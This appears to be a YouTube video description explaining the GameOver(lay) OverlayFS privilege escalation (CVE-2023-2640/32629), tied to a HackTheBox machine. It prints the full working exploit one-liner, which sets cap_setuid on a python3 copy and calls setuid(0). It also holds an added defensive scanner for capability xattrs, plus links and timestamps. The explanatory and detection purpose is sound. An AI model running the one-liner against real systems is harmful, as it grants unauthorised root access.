Gameover(lay) Exploit Explained

Published: 14 March 2024
on channel: 0xdf

The Gameover(lay) vulnerability (CVE-2023-2640 / CVE-2023-32629) was a big deal in late July 2023. The PoC is super short, and yet complex. We'll walk through the lines one by one to understand what it's doing and how it gives a low-privilege user root access by abusing OverlayFS and how it manages file attributes (like capabilities) when syncing between upper and lower.

Exploit: unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("rm -rf l m u w; id")'
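
Added example (not from the video or its author): a defender-side check for the artifact the one-liner leaves behind, a file such as u/python3 whose security.capability xattr carries cap_setuid. The decoder follows the kernel's vfs_cap_data layout; the function names and the sample bytes are constructed for illustration.

```python
import os
import struct

CAP_SETUID = 7                      # bit number from linux/capability.h
VFS_CAP_FLAGS_EFFECTIVE = 0x000001  # the "e" in cap_setuid+eip
# revision -> (count of 32-bit permitted/inheritable pairs, trailing rootid?)
REVISIONS = {1: (1, False), 2: (2, False), 3: (2, True)}

def decode_file_caps(raw):
    """Decode a security.capability xattr value (little-endian vfs_cap_data)."""
    if len(raw) < 4:
        raise ValueError("xattr too short")
    (magic,) = struct.unpack_from("<I", raw, 0)
    revision = magic >> 24
    if revision not in REVISIONS:
        raise ValueError(f"unknown revision {revision}")
    pairs, has_rootid = REVISIONS[revision]
    if len(raw) != 4 + 8 * pairs + (4 if has_rootid else 0):
        raise ValueError(f"bad length {len(raw)} for revision {revision}")
    words = struct.unpack_from(f"<{2 * pairs}I", raw, 4)
    permitted = sum(words[2 * i] << (32 * i) for i in range(pairs))
    inheritable = sum(words[2 * i + 1] << (32 * i) for i in range(pairs))
    # Revision 3 records the namespace root uid the capabilities are bound to.
    rootid = struct.unpack_from("<I", raw, 4 + 8 * pairs)[0] if has_rootid else None
    return {"revision": revision, "rootid": rootid,
            "effective": bool(magic & VFS_CAP_FLAGS_EFFECTIVE),
            "permitted": permitted, "inheritable": inheritable}

def has_setuid(caps):
    """True when CAP_SETUID is in the file's permitted set."""
    return bool((caps["permitted"] >> CAP_SETUID) & 1)

def scan(root):
    """Yield (path, caps) for files under root whose xattr permits CAP_SETUID."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                raw = os.getxattr(path, "security.capability", follow_symlinks=False)
                caps = decode_file_caps(raw)
            except (OSError, ValueError):
                continue  # no capability xattr, unreadable, or malformed
            if has_setuid(caps):
                yield path, caps

# Constructed samples: a revision 2 value with cap_setuid effective, inheritable
# and permitted, and a revision 3 value bound to a made-up namespace root uid 1000.
SAMPLE_V2 = struct.pack("<5I", 0x02000001, 1 << CAP_SETUID, 1 << CAP_SETUID, 0, 0)
SAMPLE_V3 = struct.pack("<6I", 0x03000001, 1 << CAP_SETUID, 1 << CAP_SETUID, 0, 0, 1000)
```

Run scan() over home directories, /tmp and other user-writable trees; a capability-bearing interpreter in a scratch directory is the pattern to review. A revision 3 hit is bound to the namespace root uid in rootid, while a revision 2 hit carries no such binding.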

HackTheBox Analytics Blog post: https://0xdf.gitlab.io/2024/03/23/htb...
HackTheBox Analytics: https://www.hackthebox.com/machines/a...
OverlayFS explained post from Julia Evans: https://jvns.ca/blog/2019/11/18/how-c...
Exploit Tweet from @liadeliyahu:   / 1684841527959273472  
CVE-2023-2640: https://www.cvedetails.com/cve/CVE-20...
CVE-2023-32629: https://www.cvedetails.com/cve/CVE-20...

☕ Buy Me A Coffee: https://www.buymeacoffee.com/0xdf

[00:00] Introduction
[00:47] Show exploit
[01:23] unshare / namespaces
[02:54] Setup files within namespace
[04:39] mount OverlayFS
[05:56] Using touch to get files into upper
[06:20] Exit namespace and escalate
[07:36] Revisiting exploit
[08:41] Conclusion

#pentest #ctf #bugbounty #gameoverlay #linux #privesc

